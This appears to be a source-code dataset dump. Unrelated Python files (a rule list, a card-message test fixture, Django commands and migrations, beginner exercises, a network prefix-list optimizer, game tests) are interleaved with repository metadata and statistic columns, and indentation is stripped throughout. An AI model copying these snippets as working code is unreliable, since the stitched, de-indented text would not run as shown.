self.disabled.difference_update(self.__getitem__(key))
self._rules.__delitem__(key)
def __len__(self):
return len(self._rules)
def insert(self, key, value):
if isinstance(value, basestring):
rule = self.parse_rule(value)
elif isinstance(value, Rule):
rule = value
elif isinstance(value, Rule.compiled_type):
rule = Rule(value.expression, value.upstream)
else:
raise ValueError(
'{0} is not a string, Rule or CompiledRule'.format(value)
)
if self.compile:
rule = rule.compile(self.symbols)
self._rules.insert(key, rule)
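rule.py's `CompiledRule` pre-compiles each expression to byte code with `compile(..., '<string>', 'eval')` and then evaluates it against a per-request symbol table. The core mechanism, reduced to a sketch — the expression string, the `matches` helper and the context keys below are made up for illustration, not rump's actual grammar:

```python
# Compile a rule expression once, evaluate it against many request contexts.
source = "method == 'GET' and path.startswith('/api/')"
code = compile(source, "<string>", "eval")

def matches(context):
    # Names in the expression resolve from the context mapping (locals);
    # builtins are emptied so the expression can only see the context.
    return eval(code, {"__builtins__": {}}, context)

matches({"method": "GET", "path": "/api/v1/users"})   # True
matches({"method": "POST", "path": "/api/v1/users"})  # False
```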
# === tests/__init__.py (adelosa/cardutil, MIT) ===
import binascii
def print_stream(stream, description):
stream.seek(0)
data = stream.read()
print('***' + description + '***')
print(data)
stream.seek(0)
def test_message(encoding='ascii', hex_bitmap=False):
binary_bitmap = b'\xF0\x10\x05\x42\x84\x61\x80\x02\x02\x00\x00\x04\x00\x00\x00\x00'
bitmap = binary_bitmap
if hex_bitmap:
bitmap = binascii.hexlify(binary_bitmap)
return (
'1144'.encode(encoding) +
bitmap +
('164444555544445555111111000000009999150815171500123456789012333123423579957991200000'
'012306120612345612345657994211111111145BIG BOBS\\80 KERNDALE ST\\DANERLEY\\3103 VIC'
'AUS0080001001Y99901600000000000000011234567806999999').encode(encoding))
message_ascii_raw = test_message()
message_ebcdic_raw = test_message('cp500')
message_ascii_raw_hex = test_message(hex_bitmap=True)
message_ebcdic_raw_hex = test_message('cp500', hex_bitmap=True)
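`test_message` above optionally hexlifies the 16-byte binary bitmap before splicing it into the message. The round trip on its own, using a shortened bitmap for brevity:

```python
import binascii

binary_bitmap = b'\xF0\x10\x05\x42'           # first four bytes of the bitmap
hex_bitmap = binascii.hexlify(binary_bitmap)  # b'f0100542' (twice as long)
restored = binascii.unhexlify(hex_bitmap)     # original bytes back
```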
# === management/commands/start_taskforce.py (mallipeddi/django-taskforce, BSD-3-Clause) ===
import sys
from optparse import make_option
from django.core.management.base import BaseCommand
from django.conf import settings
import taskforce
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--verbose', action='store_true', dest='verbose',
help = 'Verbose mode for you control freaks'),
make_option('--foreground', action='store_true', dest='foreground',
help = 'Run the server in the foreground.'),
)
help = """Start taskforce server."""
args = "[thread-pool-size]"
def _log(self, msg, error=False):
if self._verbose or error:
print(msg)
def handle(self, *args, **options):
# handle command-line options
self._verbose = options.get('verbose', False)
self._foreground = options.get('foreground', False)
if len(args) == 0:
pool_size = 5
elif len(args) == 1:
pool_size = int(args[0])
else:
self._log("ERROR - Takes in exactly 1 optional arg. %d were supplied." % len(args), error=True)
sys.exit(1)
address, port = taskforce.utils.get_server_loc()
available_tasks = []
for app_name in settings.INSTALLED_APPS:
app_mod = __import__(app_name, {}, {}, ['tasks'])
if hasattr(app_mod, 'tasks'):
for k in app_mod.tasks.__dict__.values():
if isinstance(k, type) and issubclass(k, taskforce.BaseTask):
available_tasks.append(k)
self._log("Starting Taskforce server...")
if self._foreground:
from taskforce.http import runserver
runserver(available_tasks, pool_size, (address, port))
else:
from taskforce.http import TaskforceDaemon
TaskforceDaemon(
"/tmp/taskforce.pid",
stdout="/tmp/taskforce.out.log",
stderr="/tmp/taskforce.err.log",
).start(available_tasks, pool_size, (address,port))
| 36.017241 | 107 | 0.581618 | 232 | 2,089 | 5.073276 | 0.418103 | 0.033985 | 0.035684 | 0.032285 | 0.056075 | 0.056075 | 0 | 0 | 0 | 0 | 0 | 0.004141 | 0.306367 | 2,089 | 57 | 108 | 36.649123 | 0.808144 | 0.012925 | 0 | 0.043478 | 0 | 0 | 0.166019 | 0.021359 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.173913 | null | null | 0.021739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52c00979320f1e4a0f34214d8d935b0833088713 | 521 | py | Python | profiles/migrations/0004_profile_smapply_user_data.py | umarmughal824/bootcamp-ecommerce | 681bcc788a66867b8f240790c0ed33680b73932b | [
"BSD-3-Clause"
] | 2 | 2018-06-20T19:37:03.000Z | 2021-01-06T09:51:40.000Z | profiles/migrations/0004_profile_smapply_user_data.py | mitodl/bootcamp-ecommerce | ba7d6aefe56c6481ae2a5afc84cdd644538b6d50 | [
"BSD-3-Clause"
] | 1,226 | 2017-02-23T14:52:28.000Z | 2022-03-29T13:19:54.000Z | profiles/migrations/0004_profile_smapply_user_data.py | umarmughal824/bootcamp-ecommerce | 681bcc788a66867b8f240790c0ed33680b73932b | [
"BSD-3-Clause"
] | 3 | 2017-03-20T03:51:27.000Z | 2021-03-19T15:54:31.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-09-13 18:42
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("profiles", "0003_profile_smapply_id")]
operations = [
migrations.AddField(
model_name="profile",
name="smapply_user_data",
field=django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True),
)
]
| 26.05 | 88 | 0.677543 | 62 | 521 | 5.516129 | 0.725806 | 0.076023 | 0.122807 | 0.157895 | 0.187135 | 0 | 0 | 0 | 0 | 0 | 0 | 0.053269 | 0.207294 | 521 | 19 | 89 | 27.421053 | 0.774818 | 0.132438 | 0 | 0 | 1 | 0 | 0.122494 | 0.051225 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52c0834ff93f1ed8d51ad80ac5952cb23df17269 | 250 | py | Python | Lists/list_of_beggars.py | petel3/Softuni_education | 4fd80f8c6ce6c3d6a838edecdb091dda2ed1084c | [
"MIT"
] | 2 | 2022-03-05T13:17:12.000Z | 2022-03-05T13:17:16.000Z | Lists/list_of_beggars.py | petel3/Softuni_education | 4fd80f8c6ce6c3d6a838edecdb091dda2ed1084c | [
"MIT"
] | null | null | null | Lists/list_of_beggars.py | petel3/Softuni_education | 4fd80f8c6ce6c3d6a838edecdb091dda2ed1084c | [
"MIT"
] | null | null | null | string = input().split(", ")
beggars = int(input())
beggars_list = []
for x in range(0, beggars):
temp = string[x::beggars]
for j in range(0, len(temp)):
temp[j] = int(temp[j])
beggars_list.append(sum(temp))
print(beggars_list) | 20.833333 | 34 | 0.616 | 38 | 250 | 3.973684 | 0.447368 | 0.218543 | 0.10596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01 | 0.2 | 250 | 12 | 35 | 20.833333 | 0.745 | 0 | 0 | 0 | 0 | 0 | 0.007968 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.111111 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
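The list_of_beggars snippet above hands out coins round-robin via stride slicing; a compact sketch of the same idea, with hard-coded sample input standing in for the original input() calls:

```python
# Each beggar i receives every n-th coin starting at offset i.
coins = "1, 2, 3, 4, 5, 6".split(", ")
n_beggars = 2

totals = [sum(int(c) for c in coins[i::n_beggars])
          for i in range(n_beggars)]
print(totals)  # [9, 12]: beggar 0 gets 1+3+5, beggar 1 gets 2+4+6
```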
52c2f493c965a91dab85655d544b65075ea9b225 | 1,978 | py | Python | python/locate_2D_array1.py | leewalter/coding | 2afd9dbfc1ecb94def35b953f4195a310d6953c9 | [
"Apache-2.0"
] | null | null | null | python/locate_2D_array1.py | leewalter/coding | 2afd9dbfc1ecb94def35b953f4195a310d6953c9 | [
"Apache-2.0"
] | null | null | null | python/locate_2D_array1.py | leewalter/coding | 2afd9dbfc1ecb94def35b953f4195a310d6953c9 | [
"Apache-2.0"
] | 1 | 2020-08-29T17:12:52.000Z | 2020-08-29T17:12:52.000Z | # python to locate 0s in a 2D array
# below saves the zero positions into a dictionary
def check_zero(array1):
d = {}
print("array index zeros at:")
for i in range(len(array1)):
index = [k for k, v in enumerate(array1[i]) if v == 0]
d[i] = index
#print(i, index)
#print(d)
return(d)
array1 = [
[1, 1, 0, 0],
[0, 0, 1, 1],
[0, 1, 0, 1]
]
array2 = [
[1, 1, 0, 0, 0],
[0, 0, 1, 1, 0],
[0, 0, 1, 0, 1]
]
print(check_zero(array1))
print(check_zero(array2))
'''
array index zeros at:
{0: [2, 3], 1: [0, 1], 2: [0, 2]}
array index zeros at:
{0: [2, 3, 4], 1: [0, 1, 4], 2: [0, 1, 3]}
'''
# below is a function
def check_zero(array1):
print("array index zeros at:")
for i in range(len(array1)):
index = [k for k, v in enumerate(array1[i]) if v == 0]
print(i, index)
return(i,index)
array1 = [
[1, 1, 0, 0],
[0, 0, 1, 1],
[0, 1, 0, 1]
]
array2 = [
[1, 1, 0, 0, 0],
[0, 0, 1, 1, 0],
[0, 0, 1, 0, 1]
]
check_zero(array1)
check_zero(array2)
'''
array index zeros at:
0 [2, 3]
1 [0, 1]
2 [0, 2]
array index zeros at:
0 [2, 3, 4]
1 [0, 1, 4]
2 [0, 1, 3]
'''
array1 = [
[1, 1, 0, 0],
[0, 0, 1, 1],
[0, 1, 0, 1]
]
for i in range(len(array1)):
index = [ k for k,v in enumerate(array1[i]) if v ==0 ]
print(i, index)
'''
outputs
0 [2, 3]
1 [0, 1]
2 [0, 2]
'''
''' very primitive below,
for i in range(0,3):
for j in range(0,4):
if (array1[i][j] == 1):
print(i,j)
'''
'''
# https://docs.scipy.org/doc/numpy-1.15.0/reference/generated/numpy.nonzero.html
# not done yet
# import numpy
array2 = numpy.array([
[1, 1, 0, 0],
[0, 0, 1, 1],
[0, 0, 0, 0]])
print(numpy.nonzero(array2))
'''
# https://stackoverflow.com/questions/27175400/how-to-find-the-index-of-a-value-in-2d-array-in-python
'''
outputs from for i,j loop
D:\Go-workspace\walter\coding\python>python locate_zero.py
0 0
0 1
1 2
1 3
2 1
2 3
'''
| 14.87218 | 101 | 0.532356 | 378 | 1,978 | 2.767196 | 0.193122 | 0.055449 | 0.054493 | 0.034417 | 0.513384 | 0.508604 | 0.507648 | 0.507648 | 0.459847 | 0.440727 | 0 | 0.12731 | 0.261375 | 1,978 | 132 | 102 | 14.984848 | 0.588638 | 0.120829 | 0 | 0.711111 | 0 | 0 | 0.043121 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0 | 0 | 0.044444 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52c49ba6e0f3c37a7b4d0399f526ea22dc7636df | 7,711 | py | Python | fib_optimizer/fib_optimizer.py | dbarrosop/sir_tools | 0c325eb8ea9667ecdc9da4f524ef2224b098fc81 | [
"Apache-2.0"
] | 9 | 2015-09-13T20:00:52.000Z | 2018-04-04T09:07:55.000Z | fib_optimizer/fib_optimizer.py | dbarrosop/sir_tools | 0c325eb8ea9667ecdc9da4f524ef2224b098fc81 | [
"Apache-2.0"
] | 2 | 2015-09-28T14:12:41.000Z | 2017-03-02T16:29:48.000Z | fib_optimizer/fib_optimizer.py | dbarrosop/sir_tools | 0c325eb8ea9667ecdc9da4f524ef2224b098fc81 | [
"Apache-2.0"
] | 5 | 2015-09-28T13:54:02.000Z | 2016-04-19T23:50:34.000Z | #!/usr/bin/env python
from pySIR.pySIR import pySIR
import argparse
import datetime
import json
import os
import shlex
import subprocess
import sys
import time
import logging
logger = logging.getLogger('fib_optimizer')
log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.DEBUG, format=log_format)
'''
def _split_tables(s):
lem = list()
lpm = list()
for p in s:
if p.split('/')[1] == '24':
lem.append(p)
else:
lpm.append(p)
return lem, lpm
def get_bgp_prefix_lists():
bgp_p = sir.get_bgp_prefixes(date=end_time).result
p = list()
for router, prefix_list in bgp_p.iteritems():
for prefix in prefix_list:
p.append(prefix)
return _split_tables(p)
def inc_exc_prefixes():
i_lem, i_lpm = _split_tables(conf['include_prefixes'])
e_lem, e_lpm = _split_tables(conf['exclude_prefixes'])
return i_lem, i_lpm, e_lem, e_lpm
def complete_prefix_list():
def _complete_pl(pl, bgp_pl, num):
if len(pl) < num:
num = num - len(pl)
for prefix in bgp_pl:
if prefix not in pl:
pl.append(prefix)
num -= 1
if num == 0:
break
return pl
else:
return pl
lem_pl = _complete_pl(lem_prefixes, bgp_lem, conf['max_lem_prefixes'])
lpm_pl = _complete_pl(lpm_prefixes, bgp_lpm, conf['max_lpm_prefixes'])
return lem_pl, lpm_pl
'''
def get_variables():
logger.debug('Getting variables from SIR')
v = sir.get_variables_by_category_and_name('apps', 'fib_optimizer').result[0]
logger.debug('Configuration: {}'.format(json.loads(v['content'])))
return json.loads(v['content'])
def get_date_range():
# These are dates for which we have flows. We want to "calculate" the range we want to use
# to calculate the topN prefixes
logger.debug('Getting available dates')
dates = sir.get_available_dates().result
if len(dates) < conf['age']:
sd = dates[0]
else:
sd = dates[-conf['age']]
ed = dates[-1]
logger.debug("Date range: {} - {}".format(sd, ed))
time_delta = datetime.datetime.now() - datetime.datetime.strptime(ed, '%Y-%m-%dT%H:%M:%S')
if time_delta.days > 2:
msg = 'Data is more than 48 hours old: {}'.format(ed)
logger.error(msg)
raise Exception(msg)
return sd, ed
def get_top_prefixes():
logger.debug('Getting top prefixes')
# limit_lem = int(conf['max_lem_prefixes']) - len(inc_lem) + len(exc_lem)
limit_lem = int(conf['max_lem_prefixes'])
lem = [p['key'] for p in sir.get_top_prefixes(
start_time=start_time,
end_time=end_time,
limit_prefixes=limit_lem,
net_masks=conf['lem_prefixes'],
filter_proto=4,).result]
# limit_lpm = int(conf['max_lpm_prefixes']) - len(inc_lpm) + len(exc_lpm)
limit_lpm = int(conf['max_lpm_prefixes'])
lpm = [p['key'] for p in sir.get_top_prefixes(
start_time=start_time,
end_time=end_time,
limit_prefixes=limit_lpm,
net_masks=conf['lem_prefixes'],
filter_proto=4,
exclude_net_masks=1,).result]
return lem, lpm
def build_prefix_lists():
logger.debug('Storing prefix lists in disk')
def _build_pl(name, prefixes):
pl = ''
for s, p in prefixes.iteritems():
prefix, mask = p.split('/')
if mask == '32' or (prefix == '' and mask == '0'):
continue
pl += 'seq {} permit {}\n'.format(s, p)
with open('{}/{}'.format(conf['path'], name), "w") as f:
f.write(pl)
_build_pl('fib_optimizer_lpm_v4', lpm_prefixes)
_build_pl('fib_optimizer_lem_v4', lem_prefixes)
def install_prefix_lists():
logger.debug('Installing the prefix-lists in the system')
cli_lpm = shlex.split('printf "refresh ip prefix-list fib_optimizer_lpm_v4"'.format(
conf['path']))
cli_lem = shlex.split('printf "refresh ip prefix-list fib_optimizer_lem_v4"'.format(
conf['path']))
cli = shlex.split('sudo ip netns exec default FastCli -p 15 -A')
p_lpm = subprocess.Popen(cli_lpm, stdout=subprocess.PIPE)
p_cli = subprocess.Popen(cli, stdin=p_lpm.stdout, stdout=subprocess.PIPE)
time.sleep(30)
p_lem = subprocess.Popen(cli_lem, stdout=subprocess.PIPE)
p_cli = subprocess.Popen(cli, stdin=p_lem.stdout, stdout=subprocess.PIPE)
def merge_pl():
logger.debug('Merging new prefix-list with existing ones')
def _merge_pl(pl, pl_file, max_p):
if os.path.isfile(pl_file):
logger.debug('Prefix list {} already exists. Merging'.format(pl_file))
with open(pl_file, 'r') as f:
original_pl = dict()
for line in f.readlines():
_, seq, permit, prefix = line.split(' ')
original_pl[prefix.rstrip()] = int(seq)
if len(original_pl) * 0.75 > len(pl):
msg = 'New prefix list ({}) is more than 25%% smaller than the new one ({})'.format(len(original_pl),
len(pl))
logger.error(msg)
raise Exception(msg)
new_prefixes = set(pl) - set(original_pl.keys())
existing_prefixes = set(pl) & set(original_pl.keys())
new_pl = dict()
for p in existing_prefixes:
new_pl[original_pl[p]] = p
empty_pos = sorted(list(set(xrange(1, int(max_p) + 1)) - set(original_pl.values())))
for p in new_prefixes:
new_pl[empty_pos.pop(0)] = p
return new_pl
else:
logger.debug('Prefix list {} does not exist'.format(pl_file))
i = 1
new = dict()
for p in pl:
new[i] = p
i += 1
return new
lem = _merge_pl(lem_prefixes, '{}/fib_optimizer_lem_v4'.format(conf['path']), conf['max_lem_prefixes'])
lpm = _merge_pl(lpm_prefixes, '{}/fib_optimizer_lpm_v4'.format(conf['path']), conf['max_lpm_prefixes'])
return lem, lpm
def purge_old_data():
logger.debug('Purging old data')
date = datetime.datetime.now() - datetime.timedelta(hours=conf['purge_older_than'])
date_text = date.strftime('%Y-%m-%dT%H:%M:%S')
logger.debug('Deleting BGP data older than: {}'.format(date_text))
sir.purge_bgp(older_than=date_text)
logger.debug('Deleting flow data older than: {}'.format(date_text))
sir.purge_flows(older_than=date_text)
if __name__ == "__main__":
if len(sys.argv) < 2:
print('You have to specify the base URL. For example: {} http://127.0.0.1:5000'.format(sys.argv[0]))
sys.exit(0)
elif sys.argv[1] == '-h' or sys.argv[1] == '--help':
print('You have to specify the base URL. For example: {} http://127.0.0.1:5000'.format(sys.argv[0]))
sys.exit(1)
logger.info('Starting fib_optimizer')
sir = pySIR(sys.argv[1], verify_ssl=False)
# We get the configuration for our application
conf = get_variables()
# The time range we want to process
start_time, end_time = get_date_range()
# We get the Top prefixes. Included and excluded prefixes are merged as well
lem_prefixes, lpm_prefixes = get_top_prefixes()
# If the prefix list exists already we merge the data
lem_prefixes, lpm_prefixes = merge_pl()
# We build the files with the prefix lists
build_prefix_lists()
install_prefix_lists()
purge_old_data()
logger.info('End fib_optimizer')
| 30.844 | 117 | 0.606925 | 1,082 | 7,711 | 4.11183 | 0.213494 | 0.032142 | 0.008092 | 0.016183 | 0.244999 | 0.235783 | 0.20499 | 0.142953 | 0.111486 | 0.090357 | 0 | 0.011478 | 0.265595 | 7,711 | 249 | 118 | 30.967871 | 0.774148 | 0.068863 | 0 | 0.132353 | 0 | 0.014706 | 0.199665 | 0.01474 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.073529 | null | null | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52c9891e030597761f62c3109bb03c2ff213dd4d | 281 | py | Python | intro/hello.py | ANU-WALD/acawsi | f6f340b59de8814173ab7dc8195c0fced53e652e | [
"MIT"
] | 1 | 2020-02-03T03:05:44.000Z | 2020-02-03T03:05:44.000Z | intro/hello.py | ANU-WALD/acawsi | f6f340b59de8814173ab7dc8195c0fced53e652e | [
"MIT"
] | null | null | null | intro/hello.py | ANU-WALD/acawsi | f6f340b59de8814173ab7dc8195c0fced53e652e | [
"MIT"
] | null | null | null |
name = "Sharalanda"
age = 10
hobbies = ["draw", "swim", "dance"]
address = {"city": "Sebastopol", "Post Code": 1234, "country": "Enchantia"}
print("My name is", name)
print("I am", age, "years old")
print("My favourite hobbie is", hobbies[0])
print("I live in", address["city"])
| 25.545455 | 75 | 0.637011 | 40 | 281 | 4.475 | 0.7 | 0.122905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029046 | 0.142349 | 281 | 10 | 76 | 28.1 | 0.713693 | 0 | 0 | 0 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
52ca2cad175cb01038bfad01648331f9f620e47e | 537 | py | Python | python/array/1550_three_consecutive_odds.py | linshaoyong/leetcode | ea052fad68a2fe0cbfa5469398508ec2b776654f | [
"MIT"
] | 6 | 2019-07-15T13:23:57.000Z | 2020-01-22T03:12:01.000Z | python/array/1550_three_consecutive_odds.py | linshaoyong/leetcode | ea052fad68a2fe0cbfa5469398508ec2b776654f | [
"MIT"
] | null | null | null | python/array/1550_three_consecutive_odds.py | linshaoyong/leetcode | ea052fad68a2fe0cbfa5469398508ec2b776654f | [
"MIT"
] | 1 | 2019-07-24T02:15:31.000Z | 2019-07-24T02:15:31.000Z | class Solution(object):
def threeConsecutiveOdds(self, arr):
"""
:type arr: List[int]
:rtype: bool
"""
odds = 0
for a in arr:
if a % 2 == 1:
odds += 1
if odds >= 3:
return True
else:
odds = 0
return False
def test_three_consecutive_odds():
s = Solution()
assert s.threeConsecutiveOdds([2, 6, 4, 1]) is False
assert s.threeConsecutiveOdds([1, 2, 34, 3, 4, 5, 7, 23, 12])
| 23.347826 | 65 | 0.463687 | 63 | 537 | 3.904762 | 0.603175 | 0.04065 | 0.219512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 0.426443 | 537 | 22 | 66 | 24.409091 | 0.727273 | 0.061453 | 0 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.133333 | false | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52cf7e995d7f53da62cf8abc38f6b4412b3b46df | 717 | py | Python | test/manager_drmaa_test.py | jmchilton/pulsar | 783b90cf0bce893a11c347fcaf6778b98e0bb062 | [
"Apache-2.0"
] | null | null | null | test/manager_drmaa_test.py | jmchilton/pulsar | 783b90cf0bce893a11c347fcaf6778b98e0bb062 | [
"Apache-2.0"
] | null | null | null | test/manager_drmaa_test.py | jmchilton/pulsar | 783b90cf0bce893a11c347fcaf6778b98e0bb062 | [
"Apache-2.0"
] | null | null | null | from .test_utils import (
BaseManagerTestCase,
skip_unless_module
)
from pulsar.managers.queued_drmaa import DrmaaQueueManager
class DrmaaManagerTest(BaseManagerTestCase):
def setUp(self):
super(DrmaaManagerTest, self).setUp()
self._set_manager()
def tearDown(self):
super(DrmaaManagerTest, self).tearDown()
self.manager.shutdown()
def _set_manager(self, **kwds):
self.manager = DrmaaQueueManager('_default_', self.app, **kwds)
@skip_unless_module("drmaa")
def test_simple_execution(self):
self._test_simple_execution(self.manager)
@skip_unless_module("drmaa")
def test_cancel(self):
self._test_cancelling(self.manager)
| 24.724138 | 71 | 0.701534 | 78 | 717 | 6.166667 | 0.384615 | 0.091476 | 0.099792 | 0.120582 | 0.274428 | 0.274428 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193863 | 717 | 28 | 72 | 25.607143 | 0.83218 | 0 | 0 | 0.2 | 0 | 0 | 0.026499 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.1 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52dbfba445e18389a6ca13cbc5580b99d308ec2f | 208 | py | Python | html/semantics/scripting-1/the-script-element/module/resources/delayed-modulescript.py | meyerweb/wpt | f04261533819893c71289614c03434c06856c13e | [
"BSD-3-Clause"
] | 14,668 | 2015-01-01T01:57:10.000Z | 2022-03-31T23:33:32.000Z | html/semantics/scripting-1/the-script-element/module/resources/delayed-modulescript.py | meyerweb/wpt | f04261533819893c71289614c03434c06856c13e | [
"BSD-3-Clause"
] | 7,642 | 2018-05-28T09:38:03.000Z | 2022-03-31T20:55:48.000Z | html/semantics/scripting-1/the-script-element/module/resources/delayed-modulescript.py | meyerweb/wpt | f04261533819893c71289614c03434c06856c13e | [
"BSD-3-Clause"
] | 5,941 | 2015-01-02T11:32:21.000Z | 2022-03-31T16:35:46.000Z | import time
def main(request, response):
delay = float(request.GET.first(b"ms", 500))
time.sleep(delay / 1E3)
return [(b"Content-type", b"text/javascript")], u"export let delayedLoaded = true;"
| 26 | 87 | 0.673077 | 30 | 208 | 4.666667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028736 | 0.163462 | 208 | 7 | 88 | 29.714286 | 0.775862 | 0 | 0 | 0 | 0 | 0 | 0.293269 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
52e56046055c96a92245aac6c622f673ad51945f | 1,962 | py | Python | tests/test_dork_erd.py | msudenvercs/Dork | 601cbb21398ac8edf5e688db2089ed8805bbdf00 | [
"MIT"
] | 1 | 2021-04-04T20:40:18.000Z | 2021-04-04T20:40:18.000Z | tests/test_dork_erd.py | msudenvercs/Dork | 601cbb21398ac8edf5e688db2089ed8805bbdf00 | [
"MIT"
] | 4 | 2019-06-04T00:59:46.000Z | 2019-06-08T17:22:19.000Z | tests/test_dork_erd.py | zenostrash/dork | 601cbb21398ac8edf5e688db2089ed8805bbdf00 | [
"MIT"
] | 4 | 2019-05-29T04:56:28.000Z | 2019-05-30T18:17:55.000Z | # -*- coding: utf-8 -*-
"""Basic tests for state and entity relationships in dork
"""
import dork.types
from tests.utils import has_many, is_a
def test_items_exist():
"""the dork module should define an Item
"""
assert "Item" in vars(dork.types)
is_a(dork.types.Item, type)
def test_holders_exist():
"""the dork module should define an Holder
"""
assert "Holder" in vars(dork.types)
is_a(dork.types.Holder, type)
def test_players_exist():
"""the dork module should define an Player
"""
assert "Player" in vars(dork.types)
is_a(dork.types.Player, type)
def test_rooms_exist():
"""the dork module should define an Room
"""
assert "Room" in vars(dork.types)
is_a(dork.types.Room, type)
def test_path_exists():
"""the dork module should define an Path
"""
assert "Path" in vars(dork.types)
is_a(dork.types.Path, type)
def test_map_exists():
"""the dork module should define an Map
"""
assert "Map" in vars(dork.types)
is_a(dork.types.Map, type)
def test_holder_has_many_items():
"""A Holder should have many Items
"""
has_many(dork.types.Holder, "holder", dork.types.Item, "items")
def test_player_is_a_holder(player):
"""A Player should be a Holder
"""
is_a(player, dork.types.Holder)
def test_room_is_a_holder(room):
"""A Room should be a Holder
"""
is_a(room, dork.types.Holder)
def test_room_has_many_players():
"""A Room should have many players
"""
has_many(dork.types.Room, "room", dork.types.Player, "players")
def test_room_has_many_paths():
"""A Room should have many Paths through exits and entrances.
"""
has_many(dork.types.Room, "entrance", dork.types.Path, "entrances")
has_many(dork.types.Room, "exit", dork.types.Path, "exits")
def test_map_has_many_rooms():
"""A Map should have many Rooms
"""
has_many(dork.types.Map, "map", dork.types.Room, "rooms")
| 23.082353 | 71 | 0.664628 | 301 | 1,962 | 4.162791 | 0.166113 | 0.179569 | 0.062251 | 0.090982 | 0.466879 | 0.400638 | 0.284118 | 0.12929 | 0 | 0 | 0 | 0.000639 | 0.201835 | 1,962 | 84 | 72 | 23.357143 | 0.799489 | 0.292559 | 0 | 0 | 0 | 0 | 0.062831 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.363636 | false | 0 | 0.060606 | 0 | 0.424242 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
